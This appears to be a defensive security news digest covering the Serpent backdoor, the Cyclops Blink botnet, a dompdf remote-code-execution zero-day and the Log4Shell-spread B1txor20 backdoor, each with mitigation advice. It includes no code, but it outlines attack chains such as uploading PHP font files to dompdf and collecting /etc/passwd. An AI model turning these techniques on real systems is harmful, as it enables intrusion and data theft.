A New Backdoor in Microsoft: Serpent
A new backdoor has been identified, used by threat actors in attacks targeting French construction, real estate, and government organizations, and distributed through popular Windows package managers.
The chain of attacks begins with distributing macro-containing Microsoft Word documents that appear to be related to the European Union General Data Protection Regulation (GDPR) to targets via targeted phishing e-mails. When targets activate the macros, a seemingly harmless image file hosted on a remote server is downloaded. However, the image file in question contains a Base64 encoded PowerShell script hidden using steganography. This PowerShell script is responsible for installing Chocolatey, the Python package manager Pip, and the PySocks proxy library on the Windows machine. The same PowerShell script is downloading another image file from the same remote server containing the Serpent backdoor, which comes with the capabilities to execute commands transmitted from the C2 server.
In addition to steganography methods, the distribution of widely used original package managers has also been observed to be an attempt to avoid detection. The campaign has not yet been associated with a known threat actor but is believed to have been carried out by a sophisticated cyber threat group. In this context, it is recommended not to respect spam e-mail attachments and links from unknown sides, raise awareness of institution/organization personnel against possible advanced phishing attacks, and use reliable anti-virus / anti-malware solutions. In addition, it is recommended to prevent the IoC findings related to the campaign from the security solutions used.
Cyclops Blink Botnet Targets ASUS Routers and WatchGuard Devices
Cyclops Blink Botnet, which is associated with Russian state-backed Sandworm APT, has been found to target Asus Routers and WatchGuard Firebox devices with a new attack campaign. A statement on the Cyclops Botnet has recently been published in a joint effort by the UK National Cyber Security Center (NCSC), CISA, NSA, and FBI.
First spotted in 2019, the Cyclops Blink Botnet is written in C and uses the TCP protocol to communicate with the command and control (C2) server. The malware uses OpenSSL functions to encrypt the intercepted data and uses Brute Force techniques to access the targeted systems. In addition, Cyclops Blink includes modules responsible for ensuring persistence on the target system, downloading additional payloads, and transferring data to C&C servers. These modules are as follows;
Asus (0x38): This module enables devices to read/write from flash memory. Flash memory is used by devices to store the operating system, configuration, and all files in the file system. And since the flash memory content is persistent, this module is used to ensure persistence on the target system and disable the factory reset feature.
System Reconnaissance (0x08): This module is responsible for sending information from infected devices to the C&C server. Some information from an infected device is as follows;
- Current Linux version,
- Memory consumption information belongs to the device
- The content of the following files;
- /etc/passwd,
- /etc/group,
- /proc/mounts,
- /proc/partitions
- The information about the network interfaces.
File Download (0x0f): This module is responsible for downloading additional files and payloads from the internet.
It is known that Cyclops Blink is targeting other security solution providers besides Asus and WatchGuard. Still, the relevant companies are not yet informed as sufficient malware samples have not been obtained yet. Regarding this issue, Asus made a statement stating that they were aware of the attacks in question and that investigations into the campaign were continuing. It is recommended to reset the devices used to factory default settings, apply the latest updates immediately, and change the default administrator credentials using powerful policies not to be the target of attacks that can be carried out using the malware. In addition, Asus recommends keeping the Remote Management function disabled, which is disabled by default.
New 0-Day in Dompdf PDF Converter Library
A 0-day vulnerability has been identified in dompdf, a PHP-based HTML to PDF conversion library, that could lead to remote code execution in specific configurations.
Threat actors who want to execute code on the target system by exploiting the vulnerability first upload the malicious font files (CSS) with the .php extension to the webserver. Then threat actors access the said font files from the vulnerable website via XSS vulnerability and trigger a remote code execution vulnerability. The vulnerability can cause severe consequences for websites that require server-side creation of PDFs such as ticket purchase and payslips, especially when the entries are not sanitized enough to mitigate XSS flaws dompdf library is installed in a publicly accessible directory.
According to statistics published by Github, dompdf is known to have 59,250 installations. Dompdf 1.2.0 and earlier versions which are “$isRemoteEnabled” configuration, enabled and located in a directory accessible over the Internet, are vulnerable. However, versions 0.8.5 and earlier of the library are affected by the vulnerability even if this option is configured as “false.” In this context, it is recommended that users who are using vulnerable dompdf versions move the Dompdf outside of the web directory, configure the “$isRemoteEnabled” option as “false,” and apply hardening where user input is sanitized against possible XSS attacks until updates that fix the vulnerability are released.
A New Linux Backdoor Detected to Deployed with Log4Shell Vulnerabilities
A new Linux backdoor that is deployed through Log4Shell security vulnerabilities and communicates with command and control servers (C&C) using the DNS tunnelling method has been detected by Netlab 360 security researchers.
In the researchers’ analyses, it has been observed that the backdoor called “B1txor20” targets systems with Linux ARM X64 CPU architecture, spreads through Apache Log4Shell vulnerabilities detected towards the end of 2021, and uses DNS tunnel technology to create a C&C communication channel. In addition to traditional backdoor functions, B1txor20 also enables Socket5 proxy, downloading Rootkit payloads from a remote server and performing data theft. Another critical factor detected related to malware is not using many advanced features. This shows that the developers of B1txor20 have developed and customized different functions according to different scenarios. The malware, which infects vulnerable systems, sends the captured sensitive information, command execution results, and other information that needs to be delivered to C&C servers as a DNS request after hiding it using specific coding techniques.
Since their disclosure, Apache Log4Shell vulnerabilities have been actively used by various threat actors such as many state-sponsored cyber threat groups and Ransomware gangs. So, a significant increase is observed in the number of malicious software that takes advantage of these vulnerabilities. In this context, it is recommended to immediately apply updates that fix vulnerabilities to systems vulnerable to Log4Shell vulnerabilities and ensure that the system/programs used are up-to-date. In addition essential to use reliable Anti-Virus/Anti-Malware solutions and block IoC findings related to malware from security solutions in use.